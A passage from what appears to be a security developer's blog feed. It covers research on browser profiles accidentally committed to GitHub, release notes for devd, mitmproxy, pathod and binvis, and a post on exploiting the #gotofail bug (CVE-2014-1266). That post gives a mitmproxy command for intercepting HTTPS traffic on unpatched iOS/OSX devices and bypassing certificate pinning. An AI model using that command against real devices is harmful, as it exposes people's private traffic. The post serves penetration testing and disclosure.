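import sqlite3
from collections import Counter

def profile_hosts(db_path):
    """The set of cookie hosts in one Firefox cookies.sqlite profile
    (assumes the standard moz_cookies table with a 'host' column)."""
    with sqlite3.connect(db_path) as conn:
        return {row[0].lstrip(".") for row in
                conn.execute("SELECT host FROM moz_cookies")}

def domain_percentages(host_sets):
    """Percentage of profiles with at least one cookie from each host,
    given one set of hosts per profile."""
    counts = Counter(h for hosts in host_sets for h in set(hosts))
    return {h: 100.0 * c / len(host_sets) for h, c in counts.items()}
```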
<p>As expected, the stats here are dominated by the mega-trackers that infest
almost every site on the internet - a familiar cast of rogues including
DoubleClick, Scorecard Research, Quantserve and so forth. It's sad to see how
few domains here are genuine destinations - apparently the top sites for this
sample are Google, YouTube, Github (not unexpectedly), and Twitter.</p>
<p>Next up is the percentage of profiles with bookmarks for a given domain:</p>
<figure>
<img class="img-responsive center-block" src="./bookmarks.png"/>
<figcaption class="text-center">Percentage of profiles with bookmarks for domain</figcaption>
</figure>
<p>Here, the top domains are those pre-seeded on install, particularly with
Firefox. This explains the Mozilla domains as well as ubuntu.com, debian.org
and launchpad.net. Once we're outside of this list, the "genuine destinations"
match the cookie dataset quite well - YouTube, Github, Wikipedia, and so forth.</p>
<h2 id="a-difficult-situation">A difficult situation</h2>
<p>The surprise here is not that people accidentally check sensitive information
into git repos. The real surprise is just how much of a pain in the butt it was
to responsibly address the issue. At the end of this little experiment, I had
more than 700 repositories that potentially contained sensitive, accidentally
exposed user information. It beggars belief, but it's 2015 and the most popular
repository hosting service in the world <a href="https://github.com/isaacs/github/issues/37">has <strong>no way</strong> to privately report a
bug against a repo</a>. One could
create a public bug report for each repository in question - but that would be
like hanging out a neon sign saying "privacy issue here" for others to find,
particularly since bug reports are published in a user's activity stream.</p>
<p>In the end, I decided to directly notify as many people as I could by email.
So, I wrote a script that checked each affected user's profile for an email
address. That left me with 120-odd users with contact details. I manually
whittled these down to repositories that were obviously accidental checkins and
sent them each an email, resulting in a dozen or so responses with variations
on "oops, thanks for letting me know".</p>
<h2 id="hey-github">Hey Github!</h2>
<p>I have two recommendations for Github that would make this situation vastly,
vastly better:</p>
<ul>
<li>
<p>Add a mechanism that lets users report private bugs, visible only to the repo
owners. There's just no excuse for the lack of a feature like this.</p>
</li>
<li>
<p>Consider restricting search functionality somewhat. One option would be not
to index dotfiles (.*) by default, and perhaps let users opt in to dotfile
indexing on a per-repo basis. The vast majority of accidental checkins are
either within dotfiles (shell history, for example), or within directories
that start with a dot (browser history, ssh config).</p>
</li>
</ul>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>In fact, Github search path specifications seem to be broken now in a
more general way, but that's beside the point for this post.</p>
</div>
devd v0.3
2015-11-12T00:00:00+00:00
2015-11-12T00:00:00+00:00
https://corte.si/posts/devd/0.3/
<div class="media">
<a href="https://github.com/cortesi/devd">
<img src="../intro/devd-terminal.png" />
</a>
</div>
<p>I've just released <a href="https://github.com/cortesi/devd/releases">devd 0.3</a> - a
measured increment, with a modest set of bugfixes and new features. This is
in line with my <a href="https://corte.si/posts/devd/0.2/">broad plan to keep devd a small, dependable, and focused
tool</a>. Everyone should update.</p>
<ul>
<li>-s (--tls) Generate a self-signed certificate, and enable TLS. The cert
bundle is stored in ~/.devd.cert</li>
<li>Add the X-Forwarded-Host header to reverse proxied traffic.</li>
<li>Disable upstream cert validation for reverse proxied traffic. This makes
using self-signed certs for development easy. Devd shouldn't be used in
contexts where this might pose a security risk.</li>
<li>Bugfix: make CSS livereload work in Firefox</li>
<li>Bugfix: make sure the Host header and SNI host match for reverse proxied
traffic.</li>
</ul>
mitmproxy: release v0.14
2015-11-07T00:00:00+00:00
2015-11-07T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_14/
<div class="media">
<a href="https://mitmproxy.org">
<img src="../announce_0_12_1/mitmproxy_0_12_1.gif" />
</a>
</div>
<p>We've just released <a href="http://www.mitmproxy.org">mitmproxy 0.14</a>! Since the last
release, the project has had 399 commits by 13 contributors, resulting in 79
closed issues and 37 closed PRs, all of this in just over 100 days.</p>
<ul>
<li>Docs: Greatly updated docs <a href="http://docs.mitmproxy.org">now hosted on ReadTheDocs</a></li>
<li>Docs: Fixed Typos, updated URLs etc. (Nick Badger, Ben Lerner, Choongwoo Han,
onlywade, Jurriaan Bremer)</li>
<li>mitmdump: Colorized TTY output</li>
<li>mitmdump: Use mitmproxy's content views for human-readable output (Chris Czub)</li>
<li>mitmproxy and mitmdump: Support for displaying UTF8 contents</li>
<li>mitmproxy: add command line switch to disable mouse interaction (Timothy Elliott)</li>
<li>mitmproxy: bug fixes (Choongwoo Han, sethp-jive, FreeArtMan)</li>
<li>mitmweb: bug fixes (Colin Bendell)</li>
<li>libmproxy: Add ability to fall back to TCP passthrough for non-HTTP connections.</li>
<li>libmproxy: Avoid double-connect in case of TLS Server Name Indication. This
yields a massive speedup for TLS handshakes.</li>
<li>libmproxy: Prevent unnecessary upstream connections (macmantrl)</li>
<li>Inline Scripts: New <a href="http://docs.mitmproxy.org/en/latest/dev/models.html#netlib.http.Headers">API for HTTP
Headers</a></li>
<li>Inline Scripts: Properly handle exceptions in <code>done</code> hook</li>
<li>Inline Scripts: Allow relative imports, provide <code>__file__</code></li>
<li>Examples: Add probabilistic TLS passthrough as an inline script</li>
<li>netlib: Refactored HTTP protocol handling code</li>
<li>netlib: ALPN support</li>
<li>netlib: fixed a bug in the optional certificate verification.</li>
<li>netlib: Initial Python 3.5 support (this is the first prerequisite for 3.x support in mitmproxy)</li>
</ul>
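<p>To give a feel for the new Headers API: header access is case-insensitive, and multiple values for a field are joined. A toy sketch of that behaviour - not mitmproxy's actual implementation, see the linked docs for the real API:</p>

```python
class Headers:
    """A toy, case-insensitive header mapping illustrating the behaviour
    the new netlib Headers API provides (not the real implementation)."""

    def __init__(self, **kwargs):
        # keyword names use _ in place of -, e.g. content_type
        self._fields = [(k.replace("_", "-"), v) for k, v in kwargs.items()]

    def __getitem__(self, name):
        values = [v for k, v in self._fields if k.lower() == name.lower()]
        if not values:
            raise KeyError(name)
        return ", ".join(values)

    def __setitem__(self, name, value):
        # setting a header replaces all existing values for that field
        self._fields = [(k, v) for k, v in self._fields
                        if k.lower() != name.lower()]
        self._fields.append((name, value))
```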
<p>I had very little time to spend on mitmproxy this cycle due to an
extraordinarily busy patch at work - so, all of the above was shepherded into
being by my hyper-efficient co-maintainer, <a href="https://maximilianhils.com/">Maximilian
Hils</a>. Having a steady pair of hands to keep
things on track while I've been "absent" has been great. As a project, we'd
also like to thank Google, who sponsored the work of <a href="https://github.com/Kriechi">Thomas
Kriechbaumer</a> under the <a href="https://developers.google.com/open-source/soc/">Google Summer of
Code</a> program, and the
<a href="https://www.honeynet.org/">Honeynet Project</a> under whose aegis the GSoC work
was done. The excellent work Thomas has done on HTTP2 support and many, many
other aspects of mitmproxy has been invaluable. Look for new releases building
on this soon.</p>
devd v0.2 (and some thoughts on small tools)
2015-11-05T00:00:00+00:00
2015-11-05T00:00:00+00:00
https://corte.si/posts/devd/0.2/
<p>I've just released <a href="https://github.com/cortesi/devd/releases">version 0.2 of
devd</a>, a local webserver for
developers. This release contains a number of small improvements and a few new
features.</p>
<ul>
<li>-x (--exclude) flag to exclude files from livereload.</li>
<li>-P (--password) flag for quick HTTP Basic password protection.</li>
<li>-q (--quiet) flag to suppress all output from devd.</li>
<li>Humanize file sizes in console logs.</li>
<li>Improve directory indexes - better formatting, they now also livereload.</li>
<li>Devd's built-in livereload URLs are now less likely to clash with user URLs.</li>
<li>Internal 404 pages are now included in logs, timing measurement, and
filtering.</li>
<li>Improved heuristics for livereload file change detection. We now handle
things like transient files created by editors better.</li>
<li>A Linux ARM build will now be distributed with each release.</li>
</ul>
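<p>The transient-file heuristics are the sort of thing that's easy to state and fiddly to get right. In spirit (the patterns below are illustrative, not devd's actual rules), the filter looks something like:</p>

```python
import os

# Suffixes and prefixes common editors use for backup and lock files.
TRANSIENT_SUFFIXES = ("~", ".swp", ".swx", ".tmp")
TRANSIENT_PREFIXES = (".#", "#")

def is_transient(path):
    """True for paths that look like transient editor artifacts,
    which should not trigger a livereload."""
    name = os.path.basename(path)
    return name.endswith(TRANSIENT_SUFFIXES) or name.startswith(TRANSIENT_PREFIXES)
```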
<p>Thanks to <a href="http://brennie.ca">Barret Rennie</a>, <a href="http://billmill.org">Bill Mill</a>
and Judson Mitchell (<a href="mailto:judsonmitchell@gmail.com">judsonmitchell@gmail.com</a>) for contributing to this
release.</p>
<h1 id="some-thoughts-on-small-tools">Some thoughts on small tools</h1>
<p>I love small, modest tools that do one thing well. I wrote devd partly out of
nostalgia for <a href="http://acme.com/software/thttpd/">thttpd</a>, a tiny web daemon that
used to be my rough-and-ready, just-serve-files-now webserver for many years. It
was a single, small binary that I could cross-compile for all the platforms I
used, and it did its humble job well. Back in the day, it was one of the first
things I put on every new box, along with my shell configuration and ssh keys.
When it started showing its age, I moved on to the usual combination of built-in
interpreter daemons (e.g. "python -m SimpleHTTPServer") and more heavy-handed
tools, but not without a touch of sadness. Looking back on it now, it's clear
that the thttpd I remember is a somewhat rose-tinted version of the real thing:
thttpd actually did both more and less than I really needed. Devd strives to be
a tool in the same spirit, one that matches more closely what I want in my
<a href="https://en.wikipedia.org/wiki/Everyday_carry">EDC</a> http daemon. If people think
of it as a small, dependable and unobtrusive part of their daily toolset, I'll
have done <em>my</em> job well.</p>
<p>This release includes a few new features for devd, and the next release will add
a few more. Not long after that, I expect it to be more or less feature
complete. It will continue to improve internally, and bugs will always be fixed,
but it will never sprout the ability to run PHP or render less on the fly (both
feature requests I've had since the first release). Instead, it will focus on
doing the few things it does as well as it can: serve files, act as a reverse
proxy tying development servers together, and live reload when files change.</p>
devd: a web daemon for developers
2015-10-23T00:00:00+00:00
2015-10-23T00:00:00+00:00
https://corte.si/posts/devd/intro/
<p>I've just released <a href="https://github.com/cortesi/devd">devd</a>, a small,
self-contained, command-line-only HTTP server for developers. It started as a
weekend stress-relief hack (that's a thing where I'm from), but has now become
my preferred "daily driver" for most web-ish things. It's simple, direct and
does more or less exactly what I need. This isn't terribly surprising, since I
wrote it to scratch my own idiosyncratic itch - hopefully other, similarly itchy
hackers will find it useful too.</p>
<h2 id="quick-start">Quick start</h2>
<p>Serve the current directory, open it in the browser (<strong>-o</strong>), and livereload
when files change (<strong>-l</strong>):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -ol</span><span style="color:#c0c5ce;"> .
</span></code></pre>
<p>Reverse proxy to http://localhost:8080, and livereload when any file in the
<strong>src</strong> directory changes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -w</span><span style="color:#c0c5ce;"> ./src http://localhost:8080
</span></code></pre><h2 id="features">Features</h2>
<h3 id="cross-platform-and-self-contained">Cross-platform and self-contained</h3>
<p>Devd is a single statically compiled binary with no external dependencies, and
is released for OSX, Linux and Windows. Don't want to install Node or Python in
that light-weight Docker instance you're hacking in? Just copy over the devd
binary and be done with it.</p>
<h3 id="designed-for-the-terminal">Designed for the terminal</h3>
<p>This means no config file, no daemonization, and logs that are designed to be
read in the terminal by a developer. Logs are colorized and log entries span
multiple lines. Devd's logs are detailed, warn about corner cases that other
daemons ignore, and can optionally include things like detailed timing
information and full headers.</p>
<div class="media">
<a href="https://github.com/cortesi/devd">
<img src="./devd-terminal.png" />
</a>
</div>
<p>To make quickly firing up an instance as simple as possible, devd automatically
chooses an open port to run on (unless it's specified), and can open a browser
window pointing to the daemon root for you (the <strong>-o</strong> flag in the example
above).</p>
<h3 id="livereload">Livereload</h3>
<p>When livereload is enabled, devd injects a small script into HTML pages, just
before the closing <em>head</em> tag. The script listens for change notifications over
a websocket connection, and reloads resources as needed. No browser addon is
required, and livereload works even for reverse proxied apps. If only changes
to CSS files are seen, devd will only reload external CSS resources, otherwise
a full page reload is done. This serves the current directory with livereload
enabled:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -l</span><span style="color:#c0c5ce;"> .
</span></code></pre>
<p>You can also trigger livereload for files that are not being served, letting
you reload reverse proxied applications when source files change. So, this
command watches the <em>src</em> directory tree, and reverse proxies to a locally
running application:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -w</span><span style="color:#c0c5ce;"> ./src http://localhost:8888
</span></code></pre><h3 id="reverse-proxy-static-file-server-flexible-routing">Reverse proxy + static file server + flexible routing</h3>
<p>Modern apps tend to be collections of web servers, and devd caters for this
with flexible reverse proxying. You can use devd to overlay a set of services
on a single domain, add livereload to services that don't natively support it,
add throttling and latency simulation to existing services, and so forth.</p>
<p>Here's a more complicated example showing how all this ties together - it
overlays two applications and a tree of static files. Livereload is enabled for
the static files (<strong>-l</strong>) and also triggered whenever source files for reverse
proxied apps change:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -l </span><span style="color:#c0c5ce;">\
</span><span style="color:#bf616a;">-w</span><span style="color:#c0c5ce;"> ./src/ \
/=http://localhost:8888 \
/api/=http://localhost:8889 \
/static/=./assets
</span></code></pre><h3 id="light-weight-virtual-hosting">Light-weight virtual hosting</h3>
<p>Devd uses a dedicated domain - <strong>devd.io</strong> - to do simple virtual hosting. This
domain and all its subdomains resolve to 127.0.0.1, which we use to set up
virtual hosting without any changes to <em>/etc/hosts</em> or other local
configuration. Route specifications that don't start with a leading <strong>/</strong> are
taken to be subdomains of <strong>devd.io</strong>. So, the following command serves a
static site from devd.io, and reverse proxies a locally
running app on api.devd.io:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd</span><span style="color:#c0c5ce;"> ./static api=http://localhost:8888
</span></code></pre>
<p>Check out the docs at <a href="https://github.com/cortesi/devd">the Github repo</a> for
the full route specification syntax.</p>
<h3 id="latency-and-bandwidth-simulation">Latency and bandwidth simulation</h3>
<p>Want to know what it's like to use your fancy 5MB HTML5 app from a mobile phone
in Botswana? Look up the bandwidth and latency
<a href="http://www.cisco.com/c/en/us/solutions/collateral/service-provider/global-cloud-index-gci/CloudIndex_Supplement.html">here</a>,
and invoke devd like so (making sure to convert from kilobits per second to
kilobytes per second):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -d</span><span style="color:#c0c5ce;"> 114</span><span style="color:#bf616a;"> -u</span><span style="color:#c0c5ce;"> 51</span><span style="color:#bf616a;"> -l</span><span style="color:#c0c5ce;"> 75 .
</span></code></pre>
<p>Devd tries to be reasonably accurate in simulating bandwidth and latency - it
uses a token bucket implementation for throttling, properly handles concurrent
requests, and chunks traffic up so data flow is smooth.</p>
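<p>For reference, a token bucket is only a few lines. A minimal single-threaded sketch of the idea (devd's real implementation is in Go and handles concurrent requests):</p>

```python
import time

class TokenBucket:
    """Minimal token-bucket limiter: tokens (here, bytes) accrue at a
    fixed rate up to a burst capacity; a send consumes tokens if it can."""

    def __init__(self, rate, capacity):
        self.rate = rate            # tokens added per second
        self.capacity = capacity    # maximum burst
        self.tokens = capacity
        self.last = time.monotonic()

    def consume(self, n):
        """Consume n tokens if available; return whether we succeeded."""
        now = time.monotonic()
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= n:
            self.tokens -= n
            return True
        return False
```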
mitmproxy: release v0.13
2015-07-26T00:00:00+00:00
2015-07-26T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_13/
<div class="media">
<a href="../announce_0_12_1/mitmproxy_0_12_1.gif">
<img src="../announce_0_12_1/mitmproxy_0_12_1.gif" />
</a>
</div>
<p>This is a slightly late announcement of the release of <a href="https://mitmproxy.org">mitmproxy
v0.13</a>, which was pushed out the door earlier this week
by my esteemed compatriots while I was tied up with other things. We have a
number of big new features this time round. First, mitmproxy now has upstream
certificate validation, thanks to the hard work of <a href="https://github.com/kyle-m">Kyle
Morton</a>. Mitmproxy is increasingly being used in
user-oriented roles where upstream cert validation is crucial, so this is a
welcome improvement. We also have a new transparent proxy mode, which uses the
HTTP Host headers to detect the upstream server to connect to, rather than the
OS NAT tables. This isn't accurate 100% of the time, but it's so convenient
that having it in the base makes sense. Thanks to
<a href="https://github.com/ijiro123">Ijiro123</a>. Other improvements include
marking of flows in mitmproxy console (thanks to <a href="https://github.com/drahosj">Jake
Drahos</a>) and an addition to the filter language
allowing better matching of source and destination addresses (thanks to <a href="https://github.com/isra17">Israel
Halle</a>).</p>
<p>This release also features something a bit more unusual: a removed feature. We
added the ability to forward server certificates through to the client verbatim
to allow mitmproxy to exploit the infamous
<a href="https://www.imperialviolet.org/2014/02/22/applebug.html">#gotofail</a> bug on iOS
and OSX. We were one of the first (and perhaps THE first) publicly available
mechanisms to exploit this issue, and pen testers, app reversers and curious
folks everywhere rejoiced. Unfortunately, cert forwarding has become a support
burden - for fiddly technical reasons, it adds a lot of complication to the way
mitmproxy is distributed and installed. Since #gotofail is no longer so
current, we've decided to remove support from mitmproxy. If you still have some
vulnerable devices out there you need to muck with, the official answer at the
moment is to install v0.12.</p>
mitmproxy v0.12.1
2015-06-04T00:00:00+00:00
2015-06-04T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_12_1/
<div class="media">
<a href="mitmproxy_0_12_1.gif">
<img src="mitmproxy_0_12_1.gif" />
</a>
</div>
<p>I've just released <a href="http://mitmproxy.org">mitmproxy v0.12.1</a>. This release
fixes a few crashing bugs that slipped through in the previous iteration, so
everyone should upgrade.</p>
<p>Also included are a number of small improvements. The most noticeable of these
is mouse interaction for mitmproxy console - the screen capture above shows me
scrolling with my mouse, clicking to view a flow and switch tabs. We pay a
small price for this - users now have to hold down a modifier key (shift on
some systems, alt on others) to select text in the terminal for copying and
pasting. To ease users into this, we've added a warning if we detect an attempt
to select text without the right modifier key.</p>
mitmproxy: release v0.12 and some project news
2015-05-26T00:00:00+00:00
2015-05-26T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_12/
<h2 id="project-news">Project News</h2>
<p>Before we get to the new release, I'd like to give a quick update on some
internal project developments.</p>
<p>First up, after a somewhat involved process that included a couple of rounds of
community voting and much discussion, we have a new logo:</p>
<div class="media">
<a href="mitmproxy-long.png">
<img src="mitmproxy-long.png" />
</a>
</div>
<p>This will be rolled out in all the places where it makes sense along with the
0.12 release.</p>
<p>Second, the long-dormant <a href="http://twitter.com/mitmproxy">@mitmproxy</a> Twitter
account is finally waking up. Please follow us there for mitmproxy project
updates and related news.</p>
<p>Third, we'd like to welcome <a href="https://github.com/Kriechi">Thomas Kriechbaumer</a>
to the project. Thomas is being sponsored to work on mitmproxy under the
<a href="https://developers.google.com/open-source/soc/">Google Summer of Code</a>
program, and will be adding HTTP2 support - one of our most anticipated
features. Special thanks goes to the <a href="https://www.honeynet.org/">Honeynet
Project</a> under whose aegis the GSoC work will be
done.</p>
<p>Lastly, a peek into the project's immediate future. We have websockets support
on the way, thanks to a protocol contribution by <a href="https://github.com/Chandler">Chandler
Abraham</a>. We have HTTP2 on the way, thanks to
Thomas. The mitmproxy web interface is gradually maturing behind the scenes,
and should be ready to be unleashed on the world soon. And, of course, the
project continues to improve quickly in almost every other respect. It's an
exciting time, and there's a lot of interesting work to do - if you'd like to
be involved, please get in touch.</p>
<h2 id="mitmproxy-v0-12">mitmproxy v0.12</h2>
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>The most immediately visible change in v0.12 is a thorough overhaul of the
console interface, which has been improved in almost every respect. Performance
and responsiveness are better, keybindings have been consolidated, and options
have been collected in a dedicated options screen (shortcut "o"). Palettes have
been overhauled entirely, with improvements to the palettes themselves, the
ability to change palettes on the fly, and support for non-transparent
(mitmproxy sets the console background) and transparent (your emulator sets the
console background) modes. The console application has also sprouted a powerful
new cookie editor that will make tampering with cookie names and values more
convenient.</p>
<p>Other major features include official support for transparent mode on FreeBSD
(thanks to <a href="http://github.com/mike-pt">Mike C</a>), the ability to log TLS master
keys for use with other tools like Wireshark, and support for creating flows from
scratch in the console app (thanks to <a href="https://github.com/gato">Marcelo Glezer</a>).
A thorough overhaul of the documentation is also under way - thanks to <a href="https://github.com/elitest">Jim
Shaver</a> for his work there.</p>
<h2 id="pathod-v0-12">pathod v0.12</h2>
<p>I'm also releasing pathod v0.12. The primary change here is the first phase of
full support for websockets. At the moment, this is client-only - server
support will follow in the next release.</p>
<p>Here's a taster - the pathoc command below initiates a websocket connection to
echo.websockets.org, then sends 10 websocket frames, each with a body of 100
random bytes.</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> ./pathoc </span><span style="color:#bf616a;">echo.websockets.org</span><span style="color:#c0c5ce;"> ws:/ wf:b@100:x10
>> ws:/
<< </span><span style="color:#d08770;">200 </span><span style="color:#bf616a;">OK:</span><span style="color:#c0c5ce;"> 225 bytes
>> wf:b@100:ir,@1
</span></code></pre>
<p>The usual range of injections and stream manipulations are available, and every
aspect of the websocket frames can be manipulated in ways that creatively
violate the specs. See the pathod documentation for the language definition.</p>
binvis.io - a browser-based tool for visualising binary data
2015-03-04T00:00:00+00:00
2015-03-04T00:00:00+00:00
https://corte.si/posts/binvis/announce/
<p>Over the years, I've written a number of posts on this blog on the topic of
binary data visualisation. I looked at <a href="https://corte.si/posts/visualisation/binvis/">using space-filling curves to understand
the structure of binary data</a>, I've
showed how <a href="https://corte.si/posts/visualisation/entropy/">entropy visualisation lets you trivially pick out compressed and
encrypted sections</a>, and I've drawn
<a href="https://corte.si/posts/visualisation/malware/">pretty pictures of malware</a>.
Unfortunately the tools I wrote (<a href="https://github.com/cortesi/scurve">code here</a>)
all produced static images, which made making practical use a pain. You really
need interactivity to be able to combine visual exploration with inspection of
the actual underlying data, and to let you easily export interesting sections.</p>
<h2 id="binvis-io"><a href="http://binvis.io">binvis.io</a></h2>
<p>I recently started toying with the idea of using web technologies to build an
interactive visualiser of this sort. One thing led to another... and today, I'm
happy to announce a first draft of the idea: binvis.io</p>
<div class="media">
<a href="http://binvis.io/#/view/examples/elf-Linux-ARMv7-ls.bin?colors=entropy">
<img src="binvis.png" />
</a>
</div>
<p>With binvis.io you can:</p>
<ul>
<li>Visually explore binary data</li>
<li>Cluster bytes to pick out fine structural features with space-filling
curves</li>
<li>Use the simple scan layout to navigate and select data intuitively</li>
<li>Flip between a number of useful byte color mappings, including an entropy
visualiser that lets you pick out compressed or encrypted sections</li>
<li>Export data segments for analysis</li>
</ul>
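<p>The clustering property comes from the space-filling curve itself: offsets that are close in the file land at pixels that are close on screen. The standard Hilbert index-to-coordinate mapping (a textbook algorithm, not binvis's actual source) looks like this:</p>

```python
def hilbert_d2xy(order, d):
    """Map a 1-D offset d to (x, y) on a Hilbert curve filling a
    2**order x 2**order grid. Consecutive offsets always map to
    adjacent cells, which is what clusters nearby bytes visually."""
    x = y = 0
    t = d
    s = 1
    while s < 2 ** order:
        rx = 1 & (t // 2)
        ry = 1 & (t ^ rx)
        if ry == 0:               # rotate the quadrant
            if rx == 1:
                x, y = s - 1 - x, s - 1 - y
            x, y = y, x
        x += s * rx
        y += s * ry
        t //= 4
        s *= 2
    return x, y
```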
<h2 id="next-steps">Next steps</h2>
<p>Right now, Binvis is local only - that is, when you open a file, all analysis is
done in your browser and nothing is sent to the server. In the longer term, I'd
like to add the ability to upload, share and annotate binaries, both publicly
and privately. There is probably a market of... oh, at least a dozen people out
there who would have use for an imgur-like sharing system for binaries. Fame and
riches surely await. Of course, there are also an immense number of other
improvements to be made to almost every aspect of binvis, ranging from speed, to
better colour schemes, to improvements in interaction and UX.</p>
<p>The todo list is long, and time is short, so I'm looking for serious
collaborators. If you're interested, drop me a line!</p>
<h2 id="thanks">Thanks</h2>
<p>Binvis isn't the first interactive binary visualisation tool of this sort. A few
others that spring to mind are
<a href="https://sites.google.com/site/xxcantorxdustxx/about">..cantor.dust</a>,
<a href="https://github.com/joesavage/binspect">bininspect</a> and
<a href="https://github.com/wapiflapi/binglide">binglide</a>. I'm trying to learn from
these precursors, and I'm delighted to see that they all also drew, to a greater
or lesser extent, on my earlier work. Thus the eternal cycle of code rolls on.</p>
<p>I'd like to particularly thank <a href="http://www.rumint.org/gregconti/">Greg Conti</a>
for letting me re-use the name of <a href="https://code.google.com/p/binvis/">his own, much earlier visualisation
tool</a>, for publishing a fascinating series of
<a href="http://www.rumint.org/gregconti/publications/taxonomy-bh.pdf">papers</a> and
<a href="https://vimeo.com/15633207">talks</a> on the topic, and for providing feedback
both on this particular incarnation of the idea as well as my earlier dabblings.</p>
mitmproxy 0.11.2
2014-12-29T00:00:00+00:00
2014-12-29T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_11_2/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I've just pushed <a href="http://mitmproxy.org">mitmproxy v0.11.2</a> out the door. This is
primarily a bugfix release, but does have one very useful new feature:
configuration files. All options available through command-line flags can now be
set persistently in config files, for all the tools - <a href="http://mitmproxy.org/doc/config.html">see the documentation for
more</a>. Adding this was made much easier by
<a href="https://github.com/zorro3/ConfigArgParse">ConfigArgParse</a>, one of those small
Python project gems that you feel more people should know about. Check it out.</p>
<p>This release also features the usual array of bugfixes and small improvements.
In particular, we now handle upstream servers that knock back connections
without SNI more gracefully, and the onboarding app now works in the OSX binary builds.
Everyone should update.</p>
mitmproxy and pathod 0.11
2014-11-07T00:00:00+00:00
2014-11-07T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_11/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I'm happy to announce that we've just released v0.11 of both
<a href="http://mitmproxy.org">mitmproxy</a> and <a href="http://pathod.net">pathod</a>. This release
features a huge revamp of mitmproxy's internals and a long list of important
features. Pathod has much improved SSL support and fuzzing.</p>
<p>Our thanks to the many testers and
<a href="https://github.com/mitmproxy/mitmproxy/blob/master/CONTRIBUTORS">contributors</a> that helped get this
out the door. Please lodge bug reports and feature requests
<a href="https://github.com/mitmproxy/mitmproxy/issues">here</a>.</p>
<h2 id="mitmproxy-changelog">Mitmproxy Changelog</h2>
<ul>
<li>Performance improvements for mitmproxy console</li>
<li>SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server</li>
<li>Data streaming for response bodies exceeding a threshold
(bradpeabody@gmail.com)</li>
<li>Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic
untouched</li>
<li>Finer-grained control of traffic replay, including options to ignore
contents or parameters when matching flows (marcelo.glezer@gmail.com)</li>
<li>Pass arguments to inline scripts</li>
<li>Configurable size limit on HTTP request and response bodies</li>
<li>Per-domain specification of interception certificates and keys (see
--cert option)</li>
<li>Certificate forwarding, relaying upstream SSL certificates verbatim (see
--cert-forward)</li>
<li>Search and highlighting for HTTP request and response bodies in
mitmproxy console (pedro@worcel.com)</li>
<li>Transparent proxy support on Windows</li>
<li>Improved error messages and logging</li>
<li>Support for FreeBSD in transparent mode, using pf (zbrdge@gmail.com)</li>
<li>Content view mode for WBXML (davidshaw835@air-watch.com)</li>
<li>Better documentation, with a new section on proxy modes</li>
<li>Generic TCP proxy mode</li>
<li>Countless bugfixes and other small improvements</li>
</ul>
<h2 id="pathod-changelog">Pathod Changelog</h2>
<ul>
<li>Hugely improved SSL support, including dynamic generation of certificates
using the mitmproxy cacert</li>
<li>pathoc -S dumps information on the remote SSL certificate chain</li>
<li>Big improvements to fuzzing, including random spec selection and memoization
to avoid repeating randomly generated patterns</li>
<li>Reflected patterns, allowing you to embed a pathod server response
specification in a pathoc request, with both resolved on the client side. This
makes fuzzing proxies and other intermediate systems much easier.</li>
</ul>
mitmproxy now supports #gotofail
2014-03-11T00:00:00+00:00
2014-03-11T00:00:00+00:00
https://corte.si/posts/security/gotofail-mitmproxy/
<p>A few weeks ago, I posted that I had hacked up <a href="https://corte.si/posts/security/cve-2014-1266/">a version of mitmproxy that
exploited CVE-2014-1266</a>, giving unrestricted
access to nearly all HTTPS traffic on affected IOS and OSX devices. I chose not
to release working code at the time, but a number of
<a href="https://github.com/gabrielg/CVE-2014-1266-poc">POCs</a> have been floating about
publicly almost since the issue was first discovered. So, the time has come to
publish - as of yesterday, <a href="https://github.com/mitmproxy/mitmproxy">mitmproxy's master
branch</a> supports #gotofail.</p>
<p>To see the exploit in action, invoke mitmproxy as follows:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">mitmproxy --ciphers</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">DHE-RSA-AES256-SHA</span><span style="color:#c0c5ce;">"</span><span style="color:#bf616a;"> --cert-forward
</span></code></pre>
<p>After configuring your device proxy, you should see something like this
screenshot, which shows off interception of miscellaneous iTunes traffic:</p>
<div class="media">
<a href="./gotofail-mitmproxy.png">
<img src="./gotofail-mitmproxy.png" />
</a>
</div>
<p>Note that the client device here has no mitmproxy CA certificate installed, and
we get circumvention of certificate pinning "for free".</p>
<p>Two new options make the magic work. The <strong>--ciphers</strong> option specifies which
SSL ciphers we should expose to connecting clients. In this case, we force the
client to use a DHE cipher, which is required to trigger the issue. The
<strong>--cert-forward</strong> option tells mitmproxy to pass upstream SSL certificates
down to the client unmodified. Usually we'd expect this to fail, since the
upstream certs won't match mitmproxy's private key. In this case #gotofail
means the client fails to properly execute the check, letting us pass
certificates through to the client verbatim as if we owned them.</p>
<p>There's one additional wrinkle that mitmproxy smooths over - before we can get
the mismatching certificate and key to the client, OpenSSL itself has to be
coaxed into accepting them. The first version of my exploit involved a patch
to OpenSSL to remove the library's own consistency check, but this is
